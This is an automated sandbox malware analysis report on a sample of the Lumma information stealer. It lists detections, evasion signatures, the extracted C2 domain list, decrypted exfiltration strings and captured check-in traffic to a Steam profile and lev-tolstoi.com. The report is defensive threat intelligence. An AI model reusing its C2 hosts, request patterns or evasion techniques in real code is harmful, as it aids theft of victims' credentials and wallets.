Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
35K4Py4lii.exe

Overview

General Information

Sample name:35K4Py4lii.exe
renamed because original name is a hash value
Original sample name:7ba64e463f6ec058337a237846d00e01.exe
Analysis ID:1580867
MD5:7ba64e463f6ec058337a237846d00e01
SHA1:a890078105095d50773058bd26d13fa1e8d3816a
SHA256:cf6807ea8e9df77101473f6beff136d993978d135293df99cb23185db2613955
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 35K4Py4lii.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\35K4Py4lii.exe" MD5: 7BA64E463F6EC058337A237846D00E01)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["talkynicer.lat", "wordyfindy.lat", "slipperyloo.lat", "shapestickyr.lat", "manyrestro.lat", "observerfry.lat", "curverpluch.lat", "bashfulacid.lat", "tentabatte.lat"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:37:16.509175+010020283713Unknown Traffic192.168.2.74970423.55.153.106443TCP
      2024-12-26T12:37:19.225330+010020283713Unknown Traffic192.168.2.749705104.21.66.86443TCP
      2024-12-26T12:37:21.279947+010020283713Unknown Traffic192.168.2.749711104.21.66.86443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:37:20.007601+010020546531A Network Trojan was detected192.168.2.749705104.21.66.86443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:37:20.007601+010020498361A Network Trojan was detected192.168.2.749705104.21.66.86443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:37:14.704430+010020584801Domain Observed Used for C2 Detected192.168.2.7495551.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:37:14.403878+010020584841Domain Observed Used for C2 Detected192.168.2.7494251.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:37:13.773652+010020584921Domain Observed Used for C2 Detected192.168.2.7574641.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:37:14.085768+010020585001Domain Observed Used for C2 Detected192.168.2.7551081.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:37:13.593088+010020585021Domain Observed Used for C2 Detected192.168.2.7653091.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:37:14.227527+010020585101Domain Observed Used for C2 Detected192.168.2.7551181.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:37:14.544673+010020585121Domain Observed Used for C2 Detected192.168.2.7578161.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:37:13.452399+010020585141Domain Observed Used for C2 Detected192.168.2.7579151.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:37:17.345832+010028586661Domain Observed Used for C2 Detected192.168.2.74970423.55.153.106443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: 35K4Py4lii.exeAvira: detected
      Antivirus detection for URL or domain
      Source: https://lev-tolstoi.com/dAvira URL Cloud: Label: malware
      Source: https://lev-tolstoi.com/jAvira URL Cloud: Label: malware
      Source: https://lev-tolstoi.com/900Avira URL Cloud: Label: malware
      Source: https://lev-tolstoi.com/api/Avira URL Cloud: Label: malware
      Found malware configuration
      Source: 35K4Py4lii.exe.7656.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["talkynicer.lat", "wordyfindy.lat", "slipperyloo.lat", "shapestickyr.lat", "manyrestro.lat", "observerfry.lat", "curverpluch.lat", "bashfulacid.lat", "tentabatte.lat"], "Build id": "PsFKDg--pablo"}
      Multi AV Scanner detection for submitted file
      Source: 35K4Py4lii.exeVirustotal: Detection: 53%Perma Link
      Source: 35K4Py4lii.exeReversingLabs: Detection: 60%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for sample
      Source: 35K4Py4lii.exeJoe Sandbox ML: detected
      Sample uses string decryption to hide its real strings
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: bashfulacid.lat
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: tentabatte.lat
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: curverpluch.lat
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: talkynicer.lat
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: shapestickyr.lat
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: manyrestro.lat
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: slipperyloo.lat
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: wordyfindy.lat
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: observerfry.lat
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
      Source: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
      Source: 35K4Py4lii.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.7:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49705 version: TLS 1.2
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov edx, ebx0_2_000B8600
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]0_2_000F1720
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_000DC09E
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_000DE0DA
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_000DC0E6
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_000DC09E
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov eax, dword ptr [000F6130h]0_2_000C8169
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_000E6210
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov ecx, eax0_2_000CC300
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_000F0340
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]0_2_000DC465
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_000DC465
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_000D8528
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov edi, ecx0_2_000DA5B6
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]0_2_000F06F0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then push esi0_2_000BC805
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_000D2830
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]0_2_000EC830
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov byte ptr [edi], al0_2_000DC850
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov eax, ebx0_2_000CC8A0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]0_2_000CC8A0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]0_2_000CC8A0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]0_2_000CC8A0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h0_2_000EC990
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h0_2_000ECA40
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then lea esi, dword ptr [eax+00000270h]0_2_000B8A50
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_000DAAC0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov edx, ecx0_2_000C8B1B
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]0_2_000BAB40
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]0_2_000CEB80
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]0_2_000BCC7A
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_000C4CA0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov edx, ecx0_2_000D6D2E
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]0_2_000F0D20
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]0_2_000EEDC1
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh0_2_000ECDF0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]0_2_000ECDF0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh0_2_000ECDF0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h0_2_000ECDF0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov ecx, eax0_2_000D2E6D
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then jmp edx0_2_000D2E6D
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]0_2_000D2E6D
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]0_2_000B2EB0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov word ptr [eax], cx0_2_000C6F52
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov esi, ecx0_2_000D90D0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov ecx, eax0_2_000DD116
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]0_2_000F1160
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov ecx, eax0_2_000DD17D
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_000DB170
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_000DD34A
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_000B73D0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_000B73D0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov eax, ebx0_2_000D7440
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]0_2_000D7440
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov word ptr [eax], cx0_2_000C747D
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov word ptr [edx], di0_2_000C747D
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]0_2_000CB57D
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then jmp eax0_2_000D9739
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]0_2_000D7740
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov dword ptr [esp+20h], eax0_2_000B9780
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then jmp edx0_2_000D37D6
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov ecx, eax0_2_000CD8AC
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov ecx, eax0_2_000CD8AC
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov ecx, eax0_2_000CD8D8
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov ecx, eax0_2_000CD8D8
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov edx, ecx0_2_000CB8F6
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov edx, ecx0_2_000CB8F6
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov byte ptr [edi], al0_2_000DB980
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then jmp edx0_2_000D39B9
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]0_2_000D39B9
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov word ptr [eax], cx0_2_000D1A10
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then dec edx0_2_000EFA20
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then dec edx0_2_000EFB10
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then dec edx0_2_000EFD70
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_000DDDFF
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_000DDE07
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 4x nop then dec edx0_2_000EFE00

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.7:57915 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.7:49425 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.7:55108 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.7:49555 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.7:65309 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.7:57464 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.7:55118 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.7:57816 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49704 -> 23.55.153.106:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49705 -> 104.21.66.86:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49705 -> 104.21.66.86:443
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: talkynicer.lat
      Source: Malware configuration extractorURLs: wordyfindy.lat
      Source: Malware configuration extractorURLs: slipperyloo.lat
      Source: Malware configuration extractorURLs: shapestickyr.lat
      Source: Malware configuration extractorURLs: manyrestro.lat
      Source: Malware configuration extractorURLs: observerfry.lat
      Source: Malware configuration extractorURLs: curverpluch.lat
      Source: Malware configuration extractorURLs: bashfulacid.lat
      Source: Malware configuration extractorURLs: tentabatte.lat
      Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
      Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49711 -> 104.21.66.86:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 104.21.66.86:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 23.55.153.106:443
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://playI equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: observerfry.lat
      Source: global trafficDNS traffic detected: DNS query: wordyfindy.lat
      Source: global trafficDNS traffic detected: DNS query: slipperyloo.lat
      Source: global trafficDNS traffic detected: DNS query: manyrestro.lat
      Source: global trafficDNS traffic detected: DNS query: shapestickyr.lat
      Source: global trafficDNS traffic detected: DNS query: talkynicer.lat
      Source: global trafficDNS traffic detected: DNS query: curverpluch.lat
      Source: global trafficDNS traffic detected: DNS query: tentabatte.lat
      Source: global trafficDNS traffic detected: DNS query: bashfulacid.lat
      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
      Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampow
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
      Source: 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.1
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steam
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/I
